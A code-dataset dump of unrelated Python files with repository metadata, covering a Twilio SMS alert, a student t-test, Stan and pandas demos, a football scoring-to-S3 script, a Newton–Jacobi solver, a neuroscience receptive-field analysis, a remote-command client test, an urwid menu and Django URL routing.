| null | 2018-01-30T16:46:30
| 2017-12-30T04:07:16
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 794
|
py
|
from twilio.rest import Client
import os
accountSID = os.environ["TWILIO_SID"]
authToken = os.environ["TWILIO_TOKEN"]
myTwilioNumber = os.environ["TWILIO_NUMBER"]
myCellPhone = os.environ["my_number"]
def send_end_alert(project_name, body='Default', accountSID=accountSID,
authToken=authToken, myTeilioNumber=myTwilioNumber,
myCellPhone=myCellPhone):
if body != 'Default': body = body
else: body = 'Your project, {}, has completed!'.format(project_name)
twilioCli = Client(accountSID, authToken)
message = twilioCli.messages.create(body=body,
from_=myTwilioNumber,
to=myCellPhone)
return message
if __name__ == '__main__':
send_end_alert('test')
|
[
"michaelmulder@Michaels-MacBook-Pro.local"
] |
michaelmulder@Michaels-MacBook-Pro.local
|
7c7062d3cb3ee5ceef84ad4f204bfa6737215dd7
|
15ae6eb98806ae70ac49b0a0214fab4c3d15e073
|
/数据科学基础/数据科学基础(/st_python/2017期末考试/大一班/ExhaustEmission.py
|
92ba2236c8a3e611613b64664a043bdf10b7d459
|
[] |
no_license
|
huyuework/professional-class
|
b423c42d401d9731f498e1c7fd0da2ebc819ba68
|
e1717c32370b7cc9d82ca7c098e57104b04af9c6
|
refs/heads/master
| 2023-08-21T21:38:32.333392
| 2021-10-06T07:56:08
| 2021-10-06T07:56:08
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,239
|
py
|
# -*- coding:utf-8 -*-
'''
log api example: log('output is: ' + str(output))
'''
from scipy.stats import t as T
from scipy.stats import f
import numpy as np
class Solution():
def solve(self):
t_2010 = ['6.0', '17.3', '104.3', '101.0', '120.4', '91.9', '30.0', '41.9', '23.9', '101.2',
'67.7', '48.7', '39.9', '49.0', '136.6', '117.6', '52.7', '64.9', '101.3', '83.5', '2.1',
'58.6', '94.6', '62.4', '41.8', '0.2', '74.2', '40.1', '12.7', '27.8', '51.5']
t_2014 = ['52041', '207793', '176469', '88880', '96190', '130672', '57246', '65987', '172867', '110665',
'82021', '41483', '76043', '40756', '81118', '106123', '96222', '21173', '65589', '33045', '1798',
'494415', '52040', '70603', '102842', '930', '69103', '72148', '71839', '92369', '74216']
d = []
for i in range(len(t_2010)):
d.append(float(t_2014[i]) - float(t_2010[i]) * 10000)
# print d
meanD = np.average(d)
Sd = np.std(d, ddof=1)
n = len(d)
t = meanD / (Sd / np.sqrt(n))
if t > T.isf(0.05, n - 1):
return [t, 'YES']
else:
return [t, 'NO']
so = Solution()
print so.solve()
|
[
"191850059@smail.nju.edu.cn"
] |
191850059@smail.nju.edu.cn
|
1cfd98dc3d88365f1d5b352e981615a2a6699195
|
cad76727b7e8f15abd7c65e9134f46c4e151f742
|
/Python/stan-irt.py
|
935b90138427857b3cf5d1d7800af1614b34ac80
|
[] |
no_license
|
AMBrown0/DataVizAss02
|
258e3b9d2f38791edf69dfcc9f78dc13400df256
|
22dcf219990540df9835d148f6c6c1219ad8aa15
|
refs/heads/main
| 2023-03-19T17:47:34.186892
| 2021-03-12T10:15:17
| 2021-03-12T10:15:17
| 276,904,746
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,085
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Sat Jan 23 12:07:25 2021
@author: andy
"""
# Generated by Selenium IDE
import pytest
import time
import json
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
from bs4 import BeautifulSoup
import pandas as pd
import os
import glob
import shutil
import pandas as pd
from pathlib import Path
import re
import matplotlib.pyplot as plt
import numpy as np
import math
from datetime import datetime
from os import path
from docx import Document
from sklearn.linear_model import LinearRegression
#LDA Imports
import gensim
import nltk
from gensim.utils import simple_preprocess
from gensim.parsing.preprocessing import STOPWORDS
from nltk.stem import WordNetLemmatizer, SnowballStemmer
from nltk.stem.porter import *
import numpy as np
from gensim import corpora, models
from pprint import pprint
np.random.seed(2018)
#nltk.download('wordnet')
#plot
import matplotlib.pyplot as plt
import seaborn as sns
#Lexicon sentiment analysis
from afinn import Afinn
from textblob import TextBlob
import pandas as pd
from pprint import pprint
import pystan
from scipy.special import expit
from matplotlib import pyplot as plt
from numpy.random import normal, randint, binomial, choice
from numpy import percentile, concatenate, array, linspace, append
#%matplotlib inline
from sklearn.metrics import r2_score
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
x_axis = linspace(-10, 10, 100)
plt.plot(x_axis, expit(x_axis))
plt.xlabel('x')
plt.xlim([-6, 6])
plt.ylabel('logistic(x)')
plt.title('The logistic function', fontsize=15)
binary_irt_model = pystan.StanModel(file="binary_irt.stan")
|
[
"andy@jivedive.local"
] |
andy@jivedive.local
|
b6683e488f292d0548f63346115c9b555ac19d7a
|
b7c1e5d140c3c41e86f206047145f7f296fed53a
|
/Textbook/Chapter 5/pandasSeriesVsDataFrame.py
|
e8417f1cc0a8b2c5317aff757d4ee250887236df
|
[
"MIT"
] |
permissive
|
jlcatonjr/Learn-Python-for-Stats-and-Econ
|
c2fbe29b324e70ceb832beafdd42d0accb37d9f9
|
194671592937562e08c92e0ef5f4793d4911701c
|
refs/heads/master
| 2023-05-11T17:17:05.934290
| 2023-05-10T20:12:10
| 2023-05-10T20:12:10
| 148,912,065
| 22
| 21
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 300
|
py
|
#pandasSeriesVsDataFrame.py
import numpy as np
import pandas as pd
dataDict = {"range":np.arange(10)}
dataSeries = pd.Series(dataDict)
print(dataSeries)
print(dataSeries["range"])
dataDF=pd.DataFrame(dataDict)
print(dataDF)
print(dataDF["range"])
print(dataDF["range"][5:9])
#print(dataDF.loc[5:9])
|
[
"jlcatonjr@gmail.com"
] |
jlcatonjr@gmail.com
|
de1e37fad3f75f1bdda9b267bc475dc95f331d6c
|
1ebdd01866600631e5db0abba10aab4c66abd4b7
|
/bench/summarize.py
|
45180f1d8cdc521bee6afedcd1a1493151e068df
|
[
"BSD-3-Clause"
] |
permissive
|
UCSD-Modern-Storage-Systems/MSS-KV-lab
|
40abf3b0b14c5145e16df2f084f52b902b9062aa
|
64f3f7bb17f45eedca24615cb9c4965e1cc4b7a2
|
refs/heads/master
| 2020-08-17T11:42:35.343853
| 2019-11-26T17:05:51
| 2019-11-26T17:05:51
| 215,661,403
| 3
| 3
| null | 2019-11-22T05:36:13
| 2019-10-16T23:18:40
|
C++
|
UTF-8
|
Python
| false
| false
| 1,454
|
py
|
import sys
benchmarks = [
('fillseq', '100'),
('fillseq', '1024'),
('fillrandom', '100'),
('fillrandom', '1024'),
('overwrite', '100'),
('overwrite', '1024'),
('readseq', '100'),
('readseq', '1024'),
('readrandom', '100'),
('readrandom', '1024'),
('deleteseq', '100'),
('deleteseq', '1024'),
('deleterandom', '100'),
('deleterandom', '1024'),
]
if __name__ == "__main__":
if len(sys.argv) != 2:
print "python %s output_file" % sys.argv[0]
sys.exit(1)
outfile_name = sys.argv[1]
# fillrandom : 15.140 micros/op 66048 ops/sec; 65.5 MB/s
# fillrandom : 15.140 micros/op 66051 ops/sec; 65.5 MB/s
# fillrandom : 15.100 micros/op 66225 ops/sec; 65.7 MB/s
# fillrandom : 15.047 micros/op 66460 ops/sec; 65.9 MB/s
files = []
tputs = []
for name, val_size in benchmarks:
file_name = '%s_%s.txt' % (name, val_size)
files.append(file_name)
tput = 0
try:
with open(file_name) as f:
lines = f.readlines()[-4:]
for line in lines:
words = line.strip().split()
bench_name = words[0]
assert bench_name == name
tput += int(words[4])
except:
tput = 0
tputs.append(tput)
files.insert(0, 'AverageThroughput')
print tputs
mean = int(sum(tputs) / len(tputs))
print "avg: %d ops/sec" % mean
tputs.insert(0, mean)
tputs = map(lambda x: str(x), tputs)
with open(outfile_name, 'w') as f:
f.write("%s\n" % ",".join(files))
f.write("%s\n" % ",".join(tputs))
|
[
"juk146@eng.ucsd.edu"
] |
juk146@eng.ucsd.edu
|
137acc6d4721ec38018a668237bf95435195db61
|
6f2a072148725d98d2bc96235fde4e0d83aa9bbd
|
/lib/assets/scoring.py
|
ce268a59ff200a95cdabcb147bf66a9dc28f670e
|
[] |
no_license
|
jjh5166/prempicks
|
1fbf86fb4fe2eec952245f7ed9d4c9441a03257c
|
24b8951b57049a2d3872b917e7ad1e79156f2f53
|
refs/heads/master
| 2023-01-22T02:59:15.803754
| 2021-01-11T21:01:14
| 2021-01-11T21:01:14
| 144,220,632
| 0
| 0
| null | 2023-01-19T14:06:00
| 2018-08-10T01:20:46
|
Ruby
|
UTF-8
|
Python
| false
| false
| 3,060
|
py
|
import http.client, sys, os, json, boto3
from os.path import join, dirname
from dotenv import load_dotenv
dotenv_path = join(dirname(__name__), '.env')
load_dotenv(dotenv_path)
APIkey = str(os.getenv('FOOTBALL_API_KEY'))
AwsAccessKeyID = str(os.getenv('AWS_ACCESS_KEY_ID'))
AwsSecretAccessKey = str(os.getenv('AWS_SECRET_ACCESS_KEY'))
AwsRegion = str(os.getenv('AWS_REGION'))
AwsBucket = str(os.getenv('S3_BUCKET'))
matchday = str(sys.argv[1])
request_string = f'/v2/competitions/PL/matches/?matchday={matchday}'
connection = http.client.HTTPConnection('api.football-data.org')
headers = {'X-Auth-Token': APIkey}
connection.request('GET', request_string, None, headers)
response = json.loads(connection.getresponse().read().decode())
s3 = boto3.resource(
's3',
region_name=AwsRegion,
aws_access_key_id=AwsAccessKeyID,
aws_secret_access_key=AwsSecretAccessKey
)
with open('app/assets/data/code_to.json') as jfile:
teamcodes = json.load(jfile)
content = s3.Object(AwsBucket, 'lastyr.json')
file_content = content.get()['Body'].read().decode('utf-8')
lastszn = json.loads(file_content)['standings']
topSix = lastszn[:6]
newThree = lastszn[17:]
class ScoreMatch:
def __init__(self, data):
self.hGoals = data['score']['fullTime']['homeTeam']
self.aGoals = data['score']['fullTime']['awayTeam']
self.hTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.aTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
if self.hGoals == self.aGoals:
self.draw(data)
else:
self.tally(self.hGoals, self.aGoals)
self.assignTeams(data, self.diff)
self.topSixOrNew(self.wTeam, self.lTeam)
def draw(self, data):
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.wScore = self.lScore = 1
def tally(self, goals1, goals2):
self.diff = goals1-goals2
cs = True if goals1*goals2 == 0 else False
self.wScore = 3 if abs(self.diff) >= 3 else 2
if cs:
self.wScore += 1
self.lScore = -4 if abs(self.diff) >= 3 else -3
def topSixOrNew(self, winner, loser):
if loser in topSix:
self.lScore -= 1
self.wScore += 1
if winner in newThree:
self.wScore += 1
def assignTeams(self, data, diff):
if diff > 0:
self.wTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
else:
self.wTeam = teamcodes[str(data['awayTeam']['id'])]['abv']
self.lTeam = teamcodes[str(data['homeTeam']['id'])]['abv']
scores = {}
for m in response['matches']:
if m['status'] == "FINISHED":
match = ScoreMatch(m)
scores[match.wTeam] = match.wScore
scores[match.lTeam] = match.lScore
scores_json = json.dumps(scores)
filename = 'scores/matchday' + matchday + '.json'
s3.Object(AwsBucket, filename).put(Body=scores_json)
|
[
"jjh5166@gmail.com"
] |
jjh5166@gmail.com
|
23880f4bb3b0fbc30871786ed1a37bc44186075e
|
19651a8d1eabe37f74dc7562c2bf3b5dcb990b32
|
/newton-jakobi.py
|
70c4afc5f7fadfbe2a2583978042a64cfb2769b3
|
[] |
no_license
|
damoklov/numeric-methods
|
b9f7571244da8da65b6fed31747c45eaefa7973d
|
3b9cde027ed1330862487f8b9eb72ddc66a95b25
|
refs/heads/master
| 2023-02-11T19:15:29.305119
| 2020-12-28T12:22:25
| 2020-12-28T12:22:25
| 311,182,365
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,754
|
py
|
def f1(x1, x2):
return x2**2 - x1**2 - 0.1 - x1
def f2(x1, x2):
return 0.1 - 2*x1*x2 - x2
def newton_jakobi():
eps = 0.001
argument_vector = [0.5, 0.5]
prev_vector = [0, 0]
identity_matrix = initialize_matrix()
f = [0, 0]
while True:
f[0] = f1(argument_vector[0], argument_vector[1])
f[1] = f2(argument_vector[0], argument_vector[1])
jacobian = build_jacobian(argument_vector, f)
reversed_jacobian = reverse_matrix(jacobian, identity_matrix)
for i in range(len(f)):
x_old = argument_vector[i]
prev_vector[i] = x_old
increment = 0.0
for j in range(2):
increment += reversed_jacobian[i][j] * f[i]
argument_vector[i] = prev_vector[i] - increment
if abs((argument_vector[0] - prev_vector[0])/argument_vector[0]) < eps:
break
elif abs((argument_vector[1] - prev_vector[1])/argument_vector[1]) < eps:
break
print(argument_vector)
print(f1(argument_vector[0], argument_vector[1]))
print(f2(argument_vector[0], argument_vector[1]))
def build_jacobian(argument_vector, function_vector):
h = 1
args = [0, 0]
f = [0, 0]
jacobian = [[0, 0], [0, 0]]
for i in range(2):
for j in range(2):
for k in range(2):
args[k] = argument_vector[k]
args[j] = argument_vector[j] + h
f[0] = f1(args[0], args[1])
f[1] = f2(args[0], args[1])
jacobian[i][j] = (f[i] - function_vector[i])/h
return jacobian
def initialize_matrix():
matrix = [[0 for _ in range(4)] for _ in range(4)]
for i in range(len(matrix)):
for j in range(len(matrix[i])):
if i == j:
matrix[i][j] = 1
else:
matrix[i][j] = 0
return matrix
def reverse_matrix(matrix, identity_matrix):
size = len(matrix)
reversed_matrix = [[0 for _ in range(size)] for _ in range(size)]
for i in range(size):
solution = roots(i, matrix, identity_matrix)
for j in range(len(solution)):
reversed_matrix[j][i] = solution[j]
return reversed_matrix
def roots(counter, matrix, identity_matrix):
size = len(matrix)
coefficients = [[0 for _ in range(size)] for _ in range(size)]
free_members = [0 for _ in range(size)]
argument_positions = [0 for _ in range(size)]
result_coefficients = [[0 for _ in range(size)] for _ in range(size)]
result_free_members = [0 for _ in range(size)]
free_members, coefficients, argument_positions = initialize_system(
free_members, identity_matrix, counter, argument_positions, coefficients, matrix)
result_free_members, free_members, coefficients, result_coefficients = direct_way(
result_free_members, free_members, coefficients, result_coefficients, argument_positions, size)
result = reverse_way(result_free_members, result_coefficients)
result, argument_positions = order_vector(result, argument_positions)
return result
def order_vector(result, argument_positions):
for i in range(len(result)):
if argument_positions != i:
arg = argument_positions[i]
value = result[i]
result[i] = result[arg]
result[arg] = value
argument_positions[i] = argument_positions[arg]
argument_positions[arg] = arg
return result, argument_positions
def direct_way(result_free_members, free_members, coefficients, result_coefficients, argument_positions, size):
for i in range(size):
coefficients, free_members, argument_positions, result_coefficients = optimize_matrix(
i, coefficients, free_members, argument_positions, result_coefficients, size)
result_free_members[i] = free_members[i] / coefficients[i][i]
for j in range(i + 1, size):
free_members[j] = free_members[j] - coefficients[j][i] * result_free_members[i]
for k in range(i + 1, size):
result_coefficients[i][k] = coefficients[i][k] / coefficients[i][i]
coefficients[j][k] = coefficients[j][k] - coefficients[j][i] * result_coefficients[i][k]
return result_free_members, free_members, coefficients, result_coefficients
def reverse_way(result_free_members, result_coefficients):
size = len(result_free_members)
solution = [0 for _ in range(size)]
for i in range(size -1, -1, -1):
sum = 0.0
for j in range(i + 1, size):
sum += result_coefficients[i][j] * solution[j]
solution[i] = result_free_members[i] - sum
return solution
def initialize_system(free_members, identity_matrix, counter, argument_positions, coefficients, matrix):
size = len(matrix)
for i in range(size):
free_members[i] = identity_matrix[i][counter]
argument_positions[i] = i
for j in range(size):
coefficients[i][j] = matrix[i][j]
return free_members, coefficients, argument_positions
def optimize_matrix(r, coefficients, free_members, argument_positions, result_coefficients, size):
max_coefficient = coefficients[r][r]
max_row = r
max_col = r
for i in range(size):
for j in range(size):
if max_coefficient < abs(coefficients[i][j]):
max_coefficient = abs(coefficients[i][j])
max_row = i
max_col = j
free_members = swap_array_values(free_members, r, max_row)
for l in range(size):
coefficients = swap_matrix_values_row(coefficients, r, max_row, l)
argument_positions = swap_argument_positions(argument_positions, r, max_col)
for m in range(size):
if m < r:
result_coefficients = swap_matrix_values_columns(result_coefficients, m, r, max_col)
else:
coefficients = swap_matrix_values_columns(coefficients, m, r, max_col)
return coefficients, free_members, argument_positions, result_coefficients
def swap_matrix_values_columns(matrix, r, fc, sc):
temp = matrix[r][fc]
matrix[r][fc] = matrix[r][sc]
matrix[r][sc] = temp
return matrix
def swap_argument_positions(argument_positions, r, max_col):
temp = argument_positions[r]
argument_positions[r] = argument_positions[max_col]
argument_positions[max_col] = temp
return argument_positions
def swap_array_values(free_members, fc, sc):
temp = free_members[fc]
free_members[fc] = free_members[sc]
free_members[sc] = temp
return free_members
def swap_matrix_values_row(matrix, fc, sc, col):
temp = matrix[fc][col]
matrix[fc][col] = matrix[sc][col]
matrix[sc][col] = temp
return matrix
if __name__ == '__main__':
newton_jakobi()
|
[
"mishanya@protonmail.com"
] |
mishanya@protonmail.com
|
aa2900526f8aa579b7ea48f1111b139ef3a08d84
|
ea96439b3fe8745e06875aa8913d487c2715d2fc
|
/NeuroAnalysisTools/scripts/analysis_database/0150_plot_ori_vs_rf_axis_DS.py
|
bb4e8680d69bc7cc65c1d6de2cc656954ee14eb7
|
[] |
no_license
|
zhuangjun1981/NeuroAnalysisTools
|
00561ddd1ee8339b5c2c7ab5d7318ac207460c5c
|
0c7acdb745ef93e009ec538af11252e743f9d430
|
refs/heads/master
| 2022-07-18T05:55:22.200409
| 2022-07-07T23:01:29
| 2022-07-07T23:01:29
| 226,148,154
| 14
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,877
|
py
|
import os
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import NeuroAnalysisTools.SingleCellAnalysis as sca
import scipy.stats as stats
import h5py
# df_path = r"G:\bulk_LGN_database\dataframe_190530171338.csv"
# rf_maps_folder = r"intermediate_results\rf_maps_dataframes_190529210731"
df_path = r"G:\bulk_LGN_database\dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30.csv"
rf_maps_folder = r"G:\bulk_LGN_database\intermediate_results" \
r"\rf_maps_dataframe_190530171338_axon_AllStimuli_DistanceThr_1.30"
depths = [50, 100, 150, 200, 250, 300, 350, 400,]
mouse_ids = ['M360495', 'M376019', 'M386444', 'M426525', 'M439939', 'M439943']
# mouse_ids = ['M439939']
dire_type = 'peak_dire' # 'vs_dire' or 'peak_dire'
response_dir = 'pos'
response_type = 'dff'
post_process_type = 'ele' # 'raw', 'ele' or 'rec'
skew_thr = 0.6
dgc_peak_z_thr = 3.
dgc_p_anova_thr = 0.01
dsi_type = 'gdsi'
dsi_thr = 0.5
osi_type = 'gosi'
osi_thr = 1. / 3.
ellipse_aspect_thr = 1.0
curr_folder = os.path.dirname(os.path.realpath(__file__))
os.chdir(curr_folder)
if dire_type == 'peak_dire' and (post_process_type == 'ele' or post_process_type == 'rec'):
dire_pp = 'raw'
else:
dire_pp = post_process_type
print('loading csv file: {}'.format(df_path))
df = pd.read_csv(df_path)
print('csv file loaded.')
df = df[(df['mouse_id'].isin(mouse_ids)) & \
(df['skew_fil'] >= skew_thr) & \
(df['dgc_{}_peak_z'.format(response_dir)] >= dgc_peak_z_thr) & \
(df['dgc_p_anova_{}'.format(response_type)] <= dgc_p_anova_thr) & \
(np.isfinite(df['rf_{}_on_peak_z'.format(response_dir)]))]
dsdf = df[(df['dgc_{}_{}_{}_{}'.format(response_dir, dsi_type, post_process_type, response_type)] >= dsi_thr)]
ds_diff_onoff = []
ds_diff_on = []
ds_diff_off = []
for roi_i, roi_row in dsdf.iterrows():
date = int(roi_row['date'])
mid = roi_row['mouse_id']
plane_n = roi_row['plane_n']
roi_n = roi_row['roi_n']
map_fn = '{}_{}_{}_{}'.format(date, mid, plane_n, response_dir)
map_f = h5py.File(os.path.join(rf_maps_folder, map_fn + '.hdf5'), 'r')
on_grp = map_f['{}_ON'.format(map_fn)]
off_grp = map_f['{}_OFF'.format(map_fn)]
dire = roi_row['dgc_{}_{}_{}_{}'.format(response_dir, dire_type, dire_pp, response_type)]
ori = sca.dire2ori(dire)
if roi_n in on_grp.keys() and roi_n in off_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
c_alt_on, c_azi_on = rf_on.get_weighted_rf_center()
c_alt_off, c_azi_off = rf_off.get_weighted_rf_center()
onoff_ang = np.arctan((c_alt_on - c_alt_off) / (c_azi_on - c_azi_off))
onoff_ang = onoff_ang * 180. / np.pi
onoff_ang = sca.dire2ori(onoff_ang)
curr_diff = abs(onoff_ang - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_onoff.append(curr_diff)
elif roi_n in on_grp.keys():
rf_on = sca.SpatialReceptiveField.from_h5_group(on_grp[roi_n])
ell_on = rf_on.ellipse_fitting(is_plot=False)
if ell_on is not None and ell_on.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_on.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_on.append(curr_diff)
elif roi_n in off_grp.keys():
rf_off = sca.SpatialReceptiveField.from_h5_group(off_grp[roi_n])
ell_off = rf_off.ellipse_fitting(is_plot=False)
if ell_off is not None and ell_off.get_aspect_ratio() >= ellipse_aspect_thr:
curr_diff = abs(ell_off.angle - ori)
if curr_diff > 90.:
curr_diff = 180 - curr_diff
ds_diff_off.append(curr_diff)
print('\nDirection Selective ROIs:')
print('\tWith ONOFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_onoff)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_onoff)))
chisq_ds_onoff, p_ds_onoff = stats.chisquare(np.histogram(ds_diff_onoff, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_onoff, p_ds_onoff))
print('\tWith only ON receptive fields:')
print('\t\tn={}'.format(len(ds_diff_on)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_on)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_on)))
chisq_ds_on, p_ds_on = stats.chisquare(np.histogram(ds_diff_on, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_on, p_ds_on))
print('\tWith only OFF receptive fields:')
print('\t\tn={}'.format(len(ds_diff_off)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_off)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_off)))
chisq_ds_off, p_ds_off = stats.chisquare(np.histogram(ds_diff_off, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_off, p_ds_off))
ds_diff_all = ds_diff_onoff + ds_diff_on + ds_diff_off
print('\tWith all receptive fields:')
print('\t\tn={}'.format(len(ds_diff_all)))
print('\t\torie difference predicted vs. measured, mean={}'.format(np.mean(ds_diff_all)))
print('\t\torie difference predicted vs. measured, std={}'.format(np.std(ds_diff_all)))
chisq_ds_all, p_ds_all = stats.chisquare(np.histogram(ds_diff_all, range=[0., 90.], bins=20)[0])
print('\t\tagainst uniform distribution: chi-squared={}, p={}'.format(chisq_ds_all, p_ds_all))
plt.hist([ds_diff_onoff, ds_diff_on, ds_diff_off], range=[0, 90], bins=20, stacked=True,
color=['purple', 'r', 'b'], ec='none', alpha=0.5)
plt.show()
|
[
"wood_stocker@hotmail.com"
] |
wood_stocker@hotmail.com
|
7ccca3ee25e9eb35c488266d7448ee7645100a6d
|
9ae680db168db40ae8feae0dc9cb42dacabbd012
|
/functest.py
|
9aa06fc03d61aa5f6d9c42e005721d6c117b51c7
|
[] |
no_license
|
tonysimpson/pyras
|
5ed4ec212b916ecb5eb3b9db8e05b43d585bb8a8
|
defbddffa04aa50c108138a63c3dd76957615994
|
refs/heads/master
| 2021-01-18T13:54:55.572472
| 2014-06-13T09:12:53
| 2014-06-13T09:12:53
| 5,888,372
| 1
| 0
| null | 2014-06-13T09:10:21
| 2012-09-20T15:07:52
|
Python
|
UTF-8
|
Python
| false
| false
| 1,078
|
py
|
# use ipython -i functest.py
import pyras
client = pyras.RemoteCommandClient('127.0.0.1')
print client.info()
client.register('echo "Hello"')
print client.info()
client.start(1)
client.register('while true; do echo "oh no!"; done')
print client.info()
client.start(2)
print client.info()
client.stop(2)
client.run('echo "hello"')
client.unregister(2)
print client.info()
client.register('echo "1"', 'group1')
client.register('echo "2"', 'group1')
client.register('echo "3"', 'group1')
client.register('echo "4"', 'group1')
client.register('echo "5"', 'group1')
client.register('echo "6"', 'group1')
client.register('echo "7"', 'group1')
print client.info()
client.start_group('group1')
client.register('echo "8"', 'group1')
client.register('echo "9"', 'group1')
client.stop_group('group1')
client.start_group('group1')
print client.info()
print client.read('README.md', 0, 20)
print client.read_end('README.md', 20)
cid = client.register(r'for i in `seq 4`; do (while true; do echo $i; done &) ; done')
client.start(cid)
print client.info()
client.stop(cid)
print client.info()
|
[
"agjasimpson@gmail.com"
] |
agjasimpson@gmail.com
|
3b07e931dae87dcef3d537f0fd4eb5ac052fa0ae
|
00d7e9321d418a2d9a607fb9376b862119f2bd4e
|
/sandbox/launcher_crap.py
|
7024adf4c0e3f981f6383ef806bc67fc73597616
|
[
"MIT"
] |
permissive
|
baluneboy/pims
|
92b9b1f64ed658867186e44b92526867696e1923
|
5a07e02588b1b7c8ebf7458b10e81b8ecf84ad13
|
refs/heads/master
| 2021-11-16T01:55:39.223910
| 2021-08-13T15:19:48
| 2021-08-13T15:19:48
| 33,029,780
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,405
|
py
|
import urwid
palette = [('header', 'white', 'black'),
('reveal focus', 'black', 'dark cyan', 'standout')]
menu = {"121f02, 200Hz": 'do 121f02, 200Hz',
"121f03, 200Hz": 'do 121f03, 200Hz',
"121f04, 200Hz": 'do 121f04, 200Hz'}
items = [urwid.Text(k) for k in menu.keys()]
content = urwid.SimpleListWalker([urwid.AttrMap(w, None, 'reveal focus') for w in items])
listbox = urwid.ListBox(content)
show_key = urwid.Text("Press any key", wrap='clip')
head = urwid.AttrMap(show_key, 'header')
top = urwid.Frame(listbox, head)
def show_all_input(input, raw):
show_key.set_text("Pressed: " + " ".join([
str(i) for i in input]))
return input
def exit_on_cr(input):
if input in ('q', 'Q'):
raise SystemExit
elif input == 'up':
focus_widget, idx = listbox.get_focus()
if idx > 0:
idx = idx-1
listbox.set_focus(idx)
elif input == 'down':
focus_widget, idx = listbox.get_focus()
idx = idx+1
if idx > len(items)-1:
idx = 0
listbox.set_focus(idx)
elif input == 'enter':
raise urwid.ExitMainLoop()
def out(s):
show_key.set_text(str(s))
loop = urwid.MainLoop(top, palette, input_filter=show_all_input, unhandled_input=exit_on_cr)
loop.run()
print(menu[items[listbox.get_focus()[1]].get_text()[0]])
|
[
"pims@mimsy.tsc.grc.nasa.gov"
] |
pims@mimsy.tsc.grc.nasa.gov
|
e02299e147fabe086c8864cff41d59b0059baa48
|
4da0c8906c9cd671e3a4bee3a6ee801a353e3d9a
|
/Water/Water/urls.py
|
8ce00454b8099894f86046e7d4be2dfd650f7cf9
|
[] |
no_license
|
avpakh/GVK
|
2a5a699caa8a986a3fd0dadbe2160fc9da5bf193
|
ac8b8d8ad5cd5ef8485e98cd532a29cd420e0cae
|
refs/heads/master
| 2020-06-13T10:35:36.663668
| 2017-01-06T09:01:42
| 2017-01-06T09:01:42
| 75,392,559
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,335
|
py
|
"""Water URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.9/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url,include
from django.contrib import admin
from watres import urls as watres_url
from watstat import urls as watstat_url
from watres import views
from django.conf.urls.static import static
from django.conf import settings
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^$',views.index_view),
url(r'^watres/',include(watres_url)),
url(r'^watstat/',include(watstat_url)),
]
if settings.DEBUG:
if settings.MEDIA_ROOT:
urlpatterns += static(settings.MEDIA_URL,
document_root=settings.MEDIA_ROOT)
urlpatterns += staticfiles_urlpatterns()
|
[
"aliaksandr.pakhomau@gmail.com"
] |
aliaksandr.pakhomau@gmail.com
|
7f168e5086d999df72156adf6973e55195c755a1
|
42a41febceba5e1ae9e410a1b07868e4e4955af1
|
/NomticketDjangoAPP/core/migrations/0019_empleado_nombreusuario.py
|
9efce0188efd1b5f211e6eb513cb6315b6e46642
|
[] |
no_license
|
ignacio1985/NomTicket_Django
|
f06fff185a3e15bb7b8d28c9dfa34000c2eb8d37
|
38600a89c4219952f3ff4fbac7b92fc7b00b3920
|
refs/heads/main
| 2023-04-09T07:35:48.448970
| 2021-04-23T03:16:44
| 2021-04-23T03:16:44
| null | 0
| 0
| null | null | null | null |
